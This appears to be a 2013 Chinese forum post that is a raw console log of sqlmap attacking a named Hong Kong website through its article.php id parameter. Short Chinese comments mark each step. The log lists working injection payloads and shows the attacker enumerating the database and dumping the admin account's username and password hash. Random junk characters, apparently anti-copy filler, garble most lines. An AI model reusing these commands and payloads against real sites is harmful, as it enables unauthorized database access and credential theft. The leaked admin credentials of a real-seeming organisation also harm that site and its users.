D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 E2 P) e* `' n) q3 ~1 ^- s
ms "Mysql" --current-user /* 注解:获取当前用户名称8 |1 V" S: n0 c, |; n
sqlmap/0.9 - automatic SQL injection and database takeover tool
/ P, @; h! ?+ q8 D& t' v http://sqlmap.sourceforge.net starting at: 16:53:54
+ J1 j& c2 j! J" b& z9 M" V[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" |7 C( g' w) ?: W$ w- }: M* Z
session file Z6 l. ^( w1 x7 U1 `" L
[16:53:54] [INFO] resuming injection data from session file ^/ L, s7 N' i- B9 K# v) i' \4 F
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* ?$ k8 b& H: I) z8 g. C9 r[16:53:54] [INFO] testing connection to the target url- b6 X* q% p0 [5 H, v+ G8 z7 G! f
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
- I- h/ j" w, h& Jsts:- f* q. F9 k/ x: e0 U( K6 T) {1 c
---
$ E( o4 y; }" `/ ~Place: GET, n- ~: v6 \2 x, i
Parameter: id
\) I6 q Q5 O0 U& @; ? Type: boolean-based blind8 j6 F3 L+ `0 t$ N7 o- m$ r
Title: AND boolean-based blind - WHERE or HAVING clause# Y. O( R5 A) [) s6 W
Payload: id=276 AND 799=7997 H, H* x1 S# X
Type: error-based
" e4 N1 a- p& \0 Y! O Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; r" K& g( L) d7 b" j1 _; @7 ~ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
k R2 c8 M Z0 K3 j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 m0 p0 t7 N* i) m+ n9 y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" W. k! `* j5 e r
Type: UNION query8 \4 I! |7 I) g" N6 ~
Title: MySQL UNION query (NULL) - 1 to 10 columns+ [; M# m: K. Q. N" e7 o
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- Y& q$ _7 n% @0 Q3 j, S7 }
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* V5 |" l% F' n1 r: R' Z- s1 f6 b: O* J
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& @# s) u; X! t Type: AND/OR time-based blind
% y! |! w/ e: b. R0 D4 g( [ Title: MySQL > 5.0.11 AND time-based blind
6 P1 t# h% U. L8 m* z5 X2 R2 R Payload: id=276 AND SLEEP(5)
. g5 e1 x$ d6 l1 J. m7 k# g9 ]---5 N0 x) R9 k. l) h: C; H! z
[16:53:55] [INFO] the back-end DBMS is MySQL$ X! I( H T9 G! _
web server operating system: Windows
. e0 y0 F9 \. O9 Fweb application technology: Apache 2.2.11, PHP 5.3.0
% S u' J; B7 `/ t( zback-end DBMS: MySQL 5.0% X; d: l4 R8 `' j& P0 `& i
[16:53:55] [INFO] fetching current user; x: Q# t: _( U- Q
current user: 'root@localhost'
' f# L/ U w' [+ e& c[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: y; r+ a5 @; `. A4 v2 C* `tput\www.wepost.com.hk' shutting down at: 16:53:58
1 n7 ^* }4 W: G, l( N9 V, } a, i5 @4 q# \- E1 o* b1 O: B
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 r* A- W$ d$ c' u0 ~7 }ms "Mysql" --current-db /*当前数据库
7 f& j) b* M& Z0 m. B' B0 O sqlmap/0.9 - automatic SQL injection and database takeover tool4 ~, }6 D0 C$ Y) k0 R! X) @! @, ^
http://sqlmap.sourceforge.net starting at: 16:54:16
4 ^- M" k" [' q0 ?; L[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
5 \" k- T# Y' A( D* D session file" l1 ^3 V6 z; F; v6 A
[16:54:16] [INFO] resuming injection data from session file8 k& F6 |8 ~; P; N& ^# {3 K
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ C: x- r9 i0 Y) N
[16:54:16] [INFO] testing connection to the target url- K2 h1 _* H1 d: r- N/ X& W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque& C J0 \5 i- a0 S$ i2 U" m- o
sts:% k- `! C, g1 X9 c; _: {
---
9 W/ U* J) L; u. P0 @Place: GET8 p2 `1 L" |) V' B5 ]
Parameter: id8 {% ^0 @% U$ M- j
Type: boolean-based blind. ]5 O% K( H9 X; P$ I) Y# w/ U; T
Title: AND boolean-based blind - WHERE or HAVING clause
# t T* ?. Q+ w8 Z" z Payload: id=276 AND 799=7995 L# g, _6 G5 p# Z8 N& C5 b P1 v: ]
Type: error-based1 q0 E5 }" F+ ], i% a
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 X& w' z! ~( t ` Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 ?. G2 G' x* O4 O7 M$ D: J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 Q! _7 I% k) Z# ?) c' \5 ]" i6 N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) f" u" f& O x2 r# R+ Z
Type: UNION query, V: `, F9 m* F% s/ y( i% _1 O
Title: MySQL UNION query (NULL) - 1 to 10 columns/ n4 O e9 p4 Y J3 x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, I- z8 A8 k$ C% w9 i* Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 s. n+ D' l0 q8 ^8 f) H$ _CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' `$ k1 p5 T0 s. R# @7 w4 p
Type: AND/OR time-based blind# P- C3 ` S3 }5 v
Title: MySQL > 5.0.11 AND time-based blind
; t- a6 l$ P4 x8 q% k' g& h Payload: id=276 AND SLEEP(5)
/ E0 s- u* }+ G; X$ ~---1 ]" ~; m4 @- _
[16:54:17] [INFO] the back-end DBMS is MySQL+ a* r5 y8 _/ w& S% b
web server operating system: Windows( y, s% _/ C' L! Q1 k$ S3 O
web application technology: Apache 2.2.11, PHP 5.3.0% f* l; L8 u: }4 Q# J" @/ ~. O
back-end DBMS: MySQL 5.0" I( h" x4 Q' `% v. J" V( C
[16:54:17] [INFO] fetching current database
) f3 X; B! f; @# J- vcurrent database: 'wepost'
- b: V* y7 W: A9 \[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
! ^) n+ S8 ~+ {# g2 H9 E7 mtput\www.wepost.com.hk' shutting down at: 16:54:18! Q# v. T( R3 O r
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! [! S% [ D/ c2 N
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名) y c; h u4 R' s' P( _6 J
sqlmap/0.9 - automatic SQL injection and database takeover tool/ ^: A& k+ w9 H. t' k
http://sqlmap.sourceforge.net starting at: 16:55:25" j- q3 C8 {; z/ ?' F: C5 d
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
; Z" r9 O6 g( y session file
& [+ k" I5 H- }; `7 k[16:55:25] [INFO] resuming injection data from session file/ l( \2 x t2 q; P3 @
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
\. G& y" ^ _2 o) H[16:55:25] [INFO] testing connection to the target url
0 w/ L1 Q* B/ `' J( D6 osqlmap identified the following injection points with a total of 0 HTTP(s) reque8 @5 u+ f: j8 T6 P
sts:
; T5 |5 }' _ h" J8 x---
7 S4 D/ F/ Z- v2 L" W7 ?( F$ bPlace: GET x E& @1 y) f9 g0 n5 a
Parameter: id
0 p% Q$ c @. [7 l: ]4 F0 y% M Type: boolean-based blind: M6 k8 d0 |# G* q& b& {
Title: AND boolean-based blind - WHERE or HAVING clause' L8 v, g. @ u* y1 ^1 Q1 W
Payload: id=276 AND 799=799% B) d4 C2 h+ x& U6 Q% N" @
Type: error-based' y8 D. X0 x! P0 ?; T5 e
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ S# N0 ?/ P, ?8 M
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- R! r) y$ z' U) b% h3 l. t( L! T% Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% e* l+ J8 V6 f+ U/ S) `% ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ p0 Z, R; K# G. \& q2 j! k Type: UNION query( o- }+ v# b9 I" J+ y
Title: MySQL UNION query (NULL) - 1 to 10 columns
& _2 O' \, J1 y" c Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 v j$ q# P8 t$ l, {2 O
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% V I: L$ ^: c. Q' ^8 JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 ~" D6 P5 l' X Type: AND/OR time-based blind( i" w* ~5 \ T3 J& ?6 v) l% k+ Z
Title: MySQL > 5.0.11 AND time-based blind+ c6 \* E5 Z2 C3 V1 x: @4 P
Payload: id=276 AND SLEEP(5)8 k8 p* A) I) c Q3 r/ }2 @
---
) U3 H. O0 ?! n6 D! {7 |[16:55:26] [INFO] the back-end DBMS is MySQL
. D' c* G8 O" W, \2 k1 M. h9 wweb server operating system: Windows C+ j; |% m" t5 M
web application technology: Apache 2.2.11, PHP 5.3.0
: ~; q9 g. W. u! j: I1 Jback-end DBMS: MySQL 5.04 M% z a" n" C' q6 V; Y
[16:55:26] [INFO] fetching tables for database 'wepost'9 V! F9 [1 D. p7 F! C) X$ S
[16:55:27] [INFO] the SQL query used returns 6 entries
1 ^- A4 {7 A/ _% n/ |7 qDatabase: wepost4 k. L" x# N2 T/ L% r4 i
[6 tables]3 `5 V3 L* b" E
+-------------+* |0 i' m9 H4 q: |
| admin |0 [( H4 U2 a( r% ?% b" r
| article |
' g! f h3 V" t G m i% S| contributor |
/ O+ j: T: D C1 u| idea |
: ?; e) O8 @7 v3 i| image |
; x3 Z' h' q& {8 u9 K. V& R| issue |
% U; _* u T& E! O+-------------+$ n% S4 T* b, e; }
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* D1 t& C! P& j, j5 B7 p
tput\www.wepost.com.hk' shutting down at: 16:55:33
" ^! @" H# ~0 x" H0 |) f& c
& e- K* ?3 }/ d# j8 G3 n' L( nD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
Q' Q V! h9 T& ?ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名2 n- w# W3 R7 I, C3 m, w( M
sqlmap/0.9 - automatic SQL injection and database takeover tool
- Z: M* l: L# {6 [ http://sqlmap.sourceforge.net starting at: 16:56:06
3 y; L- j5 m6 R2 Z0 csqlmap identified the following injection points with a total of 0 HTTP(s) reque+ Q4 F; u& e5 w2 _" x8 J' i- P
sts:& P8 J, y, [: s+ c4 [: G, [. \
---! m1 n, v J, p
Place: GET
0 T2 @- G* L- n' ?Parameter: id" I) u6 a- Z% b; t! M
Type: boolean-based blind. _' F7 V' n9 O1 W* |
Title: AND boolean-based blind - WHERE or HAVING clause
# B5 L; @ Z7 q Payload: id=276 AND 799=7994 [: j6 s! }! V% P" `8 R' W
Type: error-based* L$ |6 j8 M9 \* D' m" w7 B
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 D! o% }! I V Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," ~( i, b4 `- c+ p _
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ _1 _. v/ H) K% H$ l: {. b8 y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% f' n% |- B0 V$ |* t- D6 d3 \
Type: UNION query
( x. ^8 s" D# x! v" ?$ a0 e9 r+ D; h# h Title: MySQL UNION query (NULL) - 1 to 10 columns0 ^" y- U9 ^5 @ z
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' F/ O7 L% e% e6 [7 c8 p
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& O0 b' t" I4 \1 ^( Z1 `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 i. W! F0 c4 ?2 _( B
Type: AND/OR time-based blind' q2 G9 F4 y" S3 U* ]
Title: MySQL > 5.0.11 AND time-based blind1 S+ a5 |6 [8 o% D4 o
Payload: id=276 AND SLEEP(5)
+ \; K( l# [- [' h# f( i3 @. L--- e# A" O- i" t/ T
web server operating system: Windows
0 n$ _8 M% F5 V6 z2 yweb application technology: Apache 2.2.11, PHP 5.3.0
" b" S4 _, `; |( q% T. `back-end DBMS: MySQL 5.07 v0 G( h6 w# D7 t4 Z8 l
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se/ `8 j; n% }: O* M8 i
ssion': wepost, wepost
! k6 @: t: j- [Database: wepost
8 H8 d$ N+ r2 c. m) MTable: admin9 E1 R! `7 L1 Y
[4 columns]
8 n; Y9 t" f' ~ \6 }! c+----------+-------------+
+ @" G# [$ m- E| Column | Type |
2 ^. f! w+ H& ^. k, a$ r+----------+-------------+% |" P* w4 \$ x1 A$ k) I
| id | int(11) |
9 A4 A& v& {" }| password | varchar(32) |
& F* u$ _ O; S& P| type | varchar(10) |% @/ i, \5 c* p3 j! ?
| userid | varchar(20) |% r9 u. V Z4 D- v; O2 `$ ?! P
+----------+-------------+
' A) Z3 N4 l" q& G a shutting down at: 16:56:198 g$ _. H: |& l
" ]3 k+ Y8 q2 O- c+ T/ P
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 s2 @' _& U* P- \- [( Kms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
2 E9 X8 {" J5 @' [ X1 m sqlmap/0.9 - automatic SQL injection and database takeover tool B6 w' s8 H. k5 w7 p0 W
http://sqlmap.sourceforge.net starting at: 16:57:144 w* ]1 H# M, J- M- F9 F* S
sqlmap identified the following injection points with a total of 0 HTTP(s) reque( B8 b$ c# N+ u+ }7 r! t! |
sts:' g5 P& b0 F6 t. \2 v& g D
---
! P% }) D, |7 V, u b3 nPlace: GET9 w# B. D5 s1 Z
Parameter: id
; V2 F; O8 s9 u$ r# d- C Type: boolean-based blind
s7 ~0 s9 Q! b% ?! T8 Q Title: AND boolean-based blind - WHERE or HAVING clause0 z! ?0 E4 Y5 @* R
Payload: id=276 AND 799=7999 R [) n# Y. o2 e
Type: error-based
1 |2 D2 H/ a/ Q: D9 L. H/ j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 t0 P3 n8 v/ T# A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! m$ L' G9 A, I0 G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, k8 A4 _) _3 Q3 A
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
' s4 I' _# @/ F- a Type: UNION query
g% O8 T5 Z+ E1 |) B+ z# w& e, L Title: MySQL UNION query (NULL) - 1 to 10 columns% q4 o7 I9 y1 U/ q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ C* {* F! R6 V, F, t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* m8 S, Q( J( a" N- i$ m% h; H
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" k& ? P8 E$ b# {" n Type: AND/OR time-based blind1 b/ U8 d; v2 M
Title: MySQL > 5.0.11 AND time-based blind$ X& j C9 v& F9 g3 J/ G8 |4 u
Payload: id=276 AND SLEEP(5)' U- ]9 {0 I& |% @/ G) [
---
/ w# j& S( n( w: ?; Gweb server operating system: Windows
% x! P/ _; ~0 ^9 yweb application technology: Apache 2.2.11, PHP 5.3.0
2 Y! [# Q% `. Yback-end DBMS: MySQL 5.0
8 K9 f2 A! C: c' T5 Y+ Xrecognized possible password hash values. do you want to use dictionary attack o2 |9 T9 U( G) T3 W0 K5 Y H1 a a
n retrieved table items? [Y/n/q] y
8 g, w/ O9 B& Y3 C$ x) w" c8 zwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]. S2 q1 |8 ]' n: s
do you want to use common password suffixes? (slow!) [y/N] y
3 H; P5 T. J- I MDatabase: wepost- B8 m* x/ c, S0 e
Table: admin$ v5 w/ G1 ?# K% |0 M. T( i
[1 entry]
; h9 D1 b1 i( L& E8 Y, O+----------------------------------+------------+2 W6 W/ o' J1 `! K/ q+ K
| password | userid |# v T$ N1 b: _% E
+----------------------------------+------------+
$ d1 D; B! x' m3 I+ l) d& V8 }| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
! G: S( c+ p0 D7 Z0 M# j( n+----------------------------------+------------+! \0 {1 K3 c o! G0 o
shutting down at: 16:58:14. J6 K% i" E5 O2 W' f- m: k1 H1 {2 Y
, @4 K% Y7 ~% T5 Z* Z" Y
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对